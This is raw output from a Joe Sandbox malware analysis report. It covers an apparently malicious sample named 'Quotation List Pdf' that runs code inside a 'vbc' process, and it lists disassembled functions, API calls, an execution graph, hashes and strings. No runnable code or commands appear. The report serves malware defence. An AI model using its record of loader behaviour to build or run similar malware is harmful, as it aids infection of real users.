                                                      Function 00007FF76849CF30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76849C243), ref: 00007FF76849CF80
                                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF76849C243), ref: 00007FF76849CFC1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFileHeaderRaise
                                                      • String ID: csm
                                                      • API String ID: 2573137834-1018135373
                                                      • Opcode ID: 2158b8275b8e927ea860eb8b48a04596ff7d9b9df4afa64fc7c7d762c6f39301
                                                      • Instruction ID: 58ad98d86ae1b04a1789e274455ae8367173143e7b7c88d7cb98e6d28a5b3859
                                                      • Opcode Fuzzy Hash: 2158b8275b8e927ea860eb8b48a04596ff7d9b9df4afa64fc7c7d762c6f39301
                                                      • Instruction Fuzzy Hash: 22112B32618B41C2EB219F15E440269FBE5FF88B94F984234EE8D07B99DF3DD9518B14
                                                      Function 00007FF76843E4E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,HeapVerify,00007FF76843DD43,?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843E51B
                                                      • strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,HeapVerify,00007FF76843DD43,?,?,?,00007FF768444107,?,?,?,?,00007FF76843D115), ref: 00007FF76843E558
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: _stricmpstrtoull
                                                      • String ID: HeapVerify
                                                      • API String ID: 4031153986-2674988305
                                                      • Opcode ID: 7c2d8afe691a5ee2b53f1849f6005c7252510a015ecc9786c3c7096a8c5378b9
                                                      • Instruction ID: 75ff158b121d0a39937225274b3e05cf8f60cee6f9462c0fc136fbb91aa58058
                                                      • Opcode Fuzzy Hash: 7c2d8afe691a5ee2b53f1849f6005c7252510a015ecc9786c3c7096a8c5378b9
                                                      • Instruction Fuzzy Hash: 06015271A09A42C7EB50AF52F9C0069F7A1FF447C0F999035DA6D03B5AEE3CE8858618
                                                      Function 00007FF768455A70 Relevance: 5.1, APIs: 4, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?,?,00000080,00007FF768455BEF,?,?,?,00007FF7684633BB), ref: 00007FF768455ABD
                                                      • LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF768455BEF,?,?,?,00007FF7684633BB), ref: 00007FF768455B12
                                                      • EnterCriticalSection.KERNEL32(?,?,00000080,00007FF768455BEF,?,?,?,00007FF7684633BB), ref: 00007FF768455B2F
                                                      • LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF768455BEF,?,?,?,00007FF7684633BB), ref: 00007FF768455B4C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1463209876.00007FF768431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768430000, based on PE: true
                                                      • Associated: 00000000.00000002.1463198549.00007FF768430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463492365.00007FF7685C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768671000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF768678000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463547957.00007FF76867D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1463585868.00007FF768680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff768430000_Quotation List Pdf.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3168844106-0
                                                      • Opcode ID: a1fa865a0e94e1f8772bdde457da13c0df39fa8a2aff1e55c8e78e7da091c82e
                                                      • Instruction ID: 8544405f87d16f1bf589b00544729066aa82d1aff854a4c1158f6c6b8e8b2c26
                                                      • Opcode Fuzzy Hash: a1fa865a0e94e1f8772bdde457da13c0df39fa8a2aff1e55c8e78e7da091c82e
                                                      • Instruction Fuzzy Hash: 9121D821A08A47C2EA00AF11A8502B9E795EF19BE4FC80735DD6C436DACF3CE149C358

                                                      Execution Graph

                                                      Execution Coverage:1.4%
                                                      Dynamic/Decrypted Code Coverage:5.2%
                                                      Signature Coverage:8.2%
                                                      Total number of Nodes:134
                                                      Total number of Limit Nodes:9
                                                      execution_graph 77147 401aa0 77148 401ab0 77147->77148 77151 42e7b3 77148->77151 77154 42ce03 77151->77154 77155 42ce29 77154->77155 77166 407273 77155->77166 77157 42ce3f 77165 401b0b 77157->77165 77169 41ab83 77157->77169 77159 42ce5e 77162 42ce73 77159->77162 77184 42b6d3 77159->77184 77180 4273a3 77162->77180 77163 42ce82 77164 42b6d3 ExitProcess 77163->77164 77164->77165 77187 416433 77166->77187 77168 407280 77168->77157 77170 41abaf 77169->77170 77211 41aa73 77170->77211 77173 41abf4 77175 41ac10 77173->77175 77177 42b323 NtClose 77173->77177 77174 41abdc 77176 41abe7 77174->77176 77217 42b323 77174->77217 77175->77159 77176->77159 77179 41ac06 77177->77179 77179->77159 77181 4273fd 77180->77181 77182 42740a 77181->77182 77225 418253 77181->77225 77182->77163 77185 42b6ed 77184->77185 77186 42b6fe ExitProcess 77185->77186 77186->77162 77188 41644a 77187->77188 77190 416463 77188->77190 77191 42bd73 77188->77191 77190->77168 77193 42bd8b 77191->77193 77192 42bdaf 77192->77190 77193->77192 77198 42a973 77193->77198 77199 42a98d 77198->77199 77205 5852c0a 77199->77205 77200 42a9b9 77202 42d213 77200->77202 77208 42b683 77202->77208 77204 42be1d 77204->77190 77206 5852c11 77205->77206 77207 5852c1f LdrInitializeThunk 77205->77207 77206->77200 77207->77200 77209 42b69d 77208->77209 77210 42b6ae RtlFreeHeap 77209->77210 77210->77204 77212 41aa8d 77211->77212 77216 41ab69 77211->77216 77220 42aa13 77212->77220 77215 42b323 NtClose 77215->77216 77216->77173 77216->77174 77218 42b33d 77217->77218 77219 42b34e NtClose 77218->77219 77219->77176 77221 42aa2d 77220->77221 77224 58535c0 LdrInitializeThunk 77221->77224 77222 41ab5d 77222->77215 77224->77222 77227 418256 77225->77227 77226 4186eb 77226->77182 77227->77226 77233 413a73 77227->77233 77229 41838a 77229->77226 77230 42d213 RtlFreeHeap 77229->77230 77231 4183a2 77230->77231 77231->77226 77232 42b6d3 ExitProcess 77231->77232 77232->77226 77237 413a89 77233->77237 77235 413aec 77235->77229 77236 413ae4 77236->77229 77237->77235 77238 41ae93 RtlFreeHeap LdrInitializeThunk 77237->77238 77238->77236 77239 42a923 77240 42a940 77239->77240 77243 5852df0 LdrInitializeThunk 77240->77243 77241 42a968 77243->77241 77244 424483 77245 424492 77244->77245 77246 4244d6 77245->77246 77249 424514 77245->77249 77251 424519 77245->77251 77247 42d213 RtlFreeHeap 77246->77247 77248 4244e6 77247->77248 77250 42d213 RtlFreeHeap 77249->77250 77250->77251 77256 4240f3 77257 42410f 77256->77257 77258 424137 77257->77258 77259 42414b 77257->77259 77260 42b323 NtClose 77258->77260 77261 42b323 NtClose 77259->77261 77262 424140 77260->77262 77263 424154 77261->77263 77266 42d333 RtlAllocateHeap 77263->77266 77265 42415f 77266->77265 77267 42e2f3 77268 42e303 77267->77268 77269 42e309 77267->77269 77272 42d2f3 77269->77272 77271 42e32f 77275 42b633 77272->77275 77274 42d30e 77274->77271 77276 42b64d 77275->77276 77277 42b65e RtlAllocateHeap 77276->77277 77277->77274 77278 41ad73 77279 41adb7 77278->77279 77280 42b323 NtClose 77279->77280 77281 41add8 77279->77281 77280->77281 77282 413af3 77284 413b19 77282->77284 77283 413b2e 77284->77283 77286 413893 77284->77286 77289 42b5a3 77286->77289 77290 42b5bd 77289->77290 77293 5852c70 LdrInitializeThunk 77290->77293 77291 4138b5 77291->77283 77293->77291 77294 413d93 77295 413dac 77294->77295 77300 417703 77295->77300 77297 413dca 77298 413e16 77297->77298 77299 413e03 PostThreadMessageW 77297->77299 77299->77298 77301 417727 77300->77301 77302 41772e 77301->77302 77303 417763 LdrLoadDll 77301->77303 77302->77297 77303->77302 77304 41de93 77305 41deb9 77304->77305 77309 41dfa7 77305->77309 77310 42e423 77305->77310 77307 41df4b 77308 42a973 LdrInitializeThunk 77307->77308 77307->77309 77308->77309 77311 42e393 77310->77311 77312 42e3f0 77311->77312 77313 42d2f3 RtlAllocateHeap 77311->77313 77312->77307 77314 42e3cd 77313->77314 77315 42d213 RtlFreeHeap 77314->77315 77315->77312 77252 5852b60 LdrInitializeThunk 77253 418908 77254 42b323 NtClose 77253->77254 77255 418912 77254->77255

                                                      Executed Functions

                                                      Function 00417703 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 63 417703-41771f 64 417727-41772c 63->64 65 417722 call 42df13 63->65 66 417732-417740 call 42e433 64->66 67 41772e-417731 64->67 65->64 70 417750-417761 call 42c8d3 66->70 71 417742-41774d call 42e6d3 66->71 76 417763-417777 LdrLoadDll 70->76 77 41777a-41777d 70->77 71->70 76->77
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417775
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: c839b24bd16572aed6a7051c7c2bbafa6a578f71075491fecf3231fa6de0353c
                                                      • Instruction ID: eeced8f301d516fecf3b6cf9e82bf5757c444c6e73340693661520b8d617bc8d
                                                      • Opcode Fuzzy Hash: c839b24bd16572aed6a7051c7c2bbafa6a578f71075491fecf3231fa6de0353c
                                                      • Instruction Fuzzy Hash: 680175B5E4010DA7DF10EBE5DC42FDEB3789B54304F4041A6E91897280F634EB44CB95
                                                      Function 0042B323 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 88 42b323-42b35c call 4047c3 call 42c3d3 NtClose
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: aea83c43bb45f9675bbdc70e8d614500eeda45f9b577eecd5c5434082f95c6a5
                                                      • Instruction ID: 3039bc074491d37156bff015f972cd928b69bcf450b4b173c57b52314d4002d8
                                                      • Opcode Fuzzy Hash: aea83c43bb45f9675bbdc70e8d614500eeda45f9b577eecd5c5434082f95c6a5
                                                      • Instruction Fuzzy Hash: ABE04F316402147BD210EA5ADC81F9B776CDFC5710F008429FA0CA7282C674791186F4
                                                      Function 058535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 105 58535c0-58535cc LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8ca641dea9c4bab24c55c89dae97da9e9583b88ecd4e086151b995092345a3d4
                                                      • Instruction ID: 296092bb5e0b7f9ae70ce2bf94881c5421348568355b2e76dc73f5865717075c
                                                      • Opcode Fuzzy Hash: 8ca641dea9c4bab24c55c89dae97da9e9583b88ecd4e086151b995092345a3d4
                                                      • Instruction Fuzzy Hash: 6D90027670550406D20071584554706105587D0202FA5C411A9468568D87958E5569A3
                                                      Function 05852DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 104 5852df0-5852dfc LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: cb5ef35cb035018d4045fc9ac7ebf01ea64dfcb250da9547d1c8fb762829792f
                                                      • Instruction ID: 01c481fcdcc7fdc0ff0859b980a9b14ac360439acd7f3fe33c31ca6b7d3ace48
                                                      • Opcode Fuzzy Hash: cb5ef35cb035018d4045fc9ac7ebf01ea64dfcb250da9547d1c8fb762829792f
                                                      • Instruction Fuzzy Hash: 7B90027630140417D21171584544707005987D0242FD5C412A9468558D96568E56A522
                                                      Function 05852C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 103 5852c70-5852c7c LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 433c5b3d1166623694de07e7ecf1da0d7dd32fcb60959849be39146f8541bf45
                                                      • Instruction ID: f130d2c0f1f583d582c23cf160877ee5443d331e631e582727c3add718c2b58a
                                                      • Opcode Fuzzy Hash: 433c5b3d1166623694de07e7ecf1da0d7dd32fcb60959849be39146f8541bf45
                                                      • Instruction Fuzzy Hash: 6390027630148806D2107158844474A005587D0302F99C411AD468658D86958D957522
                                                      Function 05852B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 102 5852b60-5852b6c LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 04525b09ff79824a5f9fdac77b8a3be4a75e03fa2b07e31d5548b5dc6f2c9ac1
                                                      • Instruction ID: 809dd30d38314984e6f810917f08d56ccf4925f07abf31e6cc11ca92e0f3b16c
                                                      • Opcode Fuzzy Hash: 04525b09ff79824a5f9fdac77b8a3be4a75e03fa2b07e31d5548b5dc6f2c9ac1
                                                      • Instruction Fuzzy Hash: 7A9002A630240007420571584454716405A87E0202B95C021EA058590DC5258D956526
                                                      Function 00413D18 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: y870G2JOQ$y870G2JOQ
                                                      • API String ID: 0-340756553
                                                      • Opcode ID: f688de1afc66353fe17ba0579636bbb520c6b11486c0878a37f8ecaa991bc9d2
                                                      • Instruction ID: f912008a9ce0e7864203705e57b24ec344802695dda15a43cade87ec3fcbda66
                                                      • Opcode Fuzzy Hash: f688de1afc66353fe17ba0579636bbb520c6b11486c0878a37f8ecaa991bc9d2
                                                      • Instruction Fuzzy Hash: EA31DB32D0428579DB119F609C02FEF7FB4EF42B18F140199E5906F382E3B986878795
                                                      Function 00413D8C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 28 413d8c-413da3 29 413dac-413e01 call 42dcc3 call 417703 call 404733 call 424583 28->29 30 413da7 call 42d2b3 28->30 39 413e23-413e28 29->39 40 413e03-413e14 PostThreadMessageW 29->40 30->29 40->39 41 413e16-413e20 40->41 41->39
                                                      APIs
                                                      • PostThreadMessageW.USER32(y870G2JOQ,00000111,00000000,00000000), ref: 00413E10
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: y870G2JOQ$y870G2JOQ
                                                      • API String ID: 1836367815-340756553
                                                      • Opcode ID: 7a1c1d2bbb7b84827de7cb334df44a25798dd0402d051256b07fe7618c83d6b6
                                                      • Instruction ID: 909a04ca464126aaf77ad8d1e22a3f7f739707e813f057d993a96ea3a725619a
                                                      • Opcode Fuzzy Hash: 7a1c1d2bbb7b84827de7cb334df44a25798dd0402d051256b07fe7618c83d6b6
                                                      • Instruction Fuzzy Hash: 0C11E531D4021876EB10DB91DC42FDE7B7C9F81B14F00805AFA107B281D6B857458BE9
                                                      Function 00413D93 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 42 413d93-413da3 43 413dac-413e01 call 42dcc3 call 417703 call 404733 call 424583 42->43 44 413da7 call 42d2b3 42->44 53 413e23-413e28 43->53 54 413e03-413e14 PostThreadMessageW 43->54 44->43 54->53 55 413e16-413e20 54->55 55->53
                                                      APIs
                                                      • PostThreadMessageW.USER32(y870G2JOQ,00000111,00000000,00000000), ref: 00413E10
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: y870G2JOQ$y870G2JOQ
                                                      • API String ID: 1836367815-340756553
                                                      • Opcode ID: 855fd636073743eba5a1a7b23e7a17215b259c7ae586414cdfbe5350c89fd9f7
                                                      • Instruction ID: 3058a54dbd29a06e027b2ce5d794ffe46b737ef8e11a4404d8236d5dbdc6aae9
                                                      • Opcode Fuzzy Hash: 855fd636073743eba5a1a7b23e7a17215b259c7ae586414cdfbe5350c89fd9f7
                                                      • Instruction Fuzzy Hash: 0E01C431E4031876EB21AA919C02FDF7B7C9F41B14F048059FA147B2C1D6F896458BEA
                                                      Function 0042B633 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 78 42b633-42b674 call 4047c3 call 42c3d3 RtlAllocateHeap
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,0041DF4B,?,?,00000000,?,0041DF4B,?,?,?), ref: 0042B66F
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: b7f2757ac2d67da2e220e558bac8420130ef538032ac032da27c65484dfab29d
                                                      • Instruction ID: 4903e161e240f14165b1b6672f053255631e24b787b26f573fe19e33aaf648ec
                                                      • Opcode Fuzzy Hash: b7f2757ac2d67da2e220e558bac8420130ef538032ac032da27c65484dfab29d
                                                      • Instruction Fuzzy Hash: 26E06D716442087BE610EE59DC41FAB33ADEFC5710F004419FA08A7242C674B9108BB8
                                                      Function 0042B683 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 83 42b683-42b6c4 call 4047c3 call 42c3d3 RtlFreeHeap
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,000038B9,00000007,00000000,00000004,00000000,00416FDD,000000F4,?,?,?,?,?), ref: 0042B6BF
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 0112f9322e6f1835dd35a6fc29f2826ad6aaf91cfcf238a7f57362f68a7b31ae
                                                      • Instruction ID: 1c83892d60417b5e4ab37d158829327125a5608814a669f9e15954a2b43496e2
                                                      • Opcode Fuzzy Hash: 0112f9322e6f1835dd35a6fc29f2826ad6aaf91cfcf238a7f57362f68a7b31ae
                                                      • Instruction Fuzzy Hash: F0E06D75644208BBD614EE59DC41EAB33ACEFC5710F00441DFE08A7282C670B9108BB9
                                                      Function 0042B6D3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 93 42b6d3-42b70c call 4047c3 call 42c3d3 ExitProcess
                                                      APIs
                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,07E5FE20,?,?,07E5FE20), ref: 0042B707
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: 48bb91168e281495610eac6062f1ad4e0f41f16c92e83059ba1397e7a24a77a3
                                                      • Instruction ID: 161a1daadeaf9ad9d9ead48a002dc238042592eab69b761733b69c166c64c94b
                                                      • Opcode Fuzzy Hash: 48bb91168e281495610eac6062f1ad4e0f41f16c92e83059ba1397e7a24a77a3
                                                      • Instruction Fuzzy Hash: FDE04F356402147BD210EB5ADC41F9B77ADDBC6B14F008429FA09A7181C7B1B9148BF5
                                                      Function 05852C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 98 5852c0a-5852c0f 99 5852c11-5852c18 98->99 100 5852c1f-5852c26 LdrInitializeThunk 98->100
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 76c612704cf1fcb429e04178e5f764c1b16e29e4d7952c86d68961fc0aff39c0
                                                      • Instruction ID: d4be459742da0d7f4aa513db123c9721c55cef6857fe7b4c92452919b15b1a26
                                                      • Opcode Fuzzy Hash: 76c612704cf1fcb429e04178e5f764c1b16e29e4d7952c86d68961fc0aff39c0
                                                      • Instruction Fuzzy Hash: EDB02B729014C0C9DB00E3200608B17390077C0301F15C021DB034241F0738C8C0E172

                                                      Non-executed Functions

                                                      Function 05848620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Critical section address, xrefs: 05885425, 058854BC, 05885534
                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 058854CE
                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 05885543
                                                      • double initialized or corrupted critical section, xrefs: 05885508
                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0588540A, 05885496, 05885519
                                                      • Address of the debug info found in the active list., xrefs: 058854AE, 058854FA
                                                      • Critical section debug info address, xrefs: 0588541F, 0588552E
                                                      • undeleted critical section in freed memory, xrefs: 0588542B
                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 058854E2
                                                      • 8, xrefs: 058852E3
                                                      • Thread identifier, xrefs: 0588553A
                                                      • Invalid debug info address of this critical section, xrefs: 058854B6
                                                      • corrupted critical section, xrefs: 058854C2
                                                      • Critical section address., xrefs: 05885502
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                      • API String ID: 0-2368682639
                                                      • Opcode ID: a621775d8d396b066552bc2c3b46cb9efb09f8bc89bde0871ba7af18f5379faf
                                                      • Instruction ID: d657814d57b92fde1dc23508c98696688271d3aece77929c79f6c64dc41fe005
                                                      • Opcode Fuzzy Hash: a621775d8d396b066552bc2c3b46cb9efb09f8bc89bde0871ba7af18f5379faf
                                                      • Instruction Fuzzy Hash: 5E8167B1A41348AFDB20DF99C845BAEBBB6FB08B14F104159FA05F7280D3B1AD45EB51
                                                      Function 058A9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
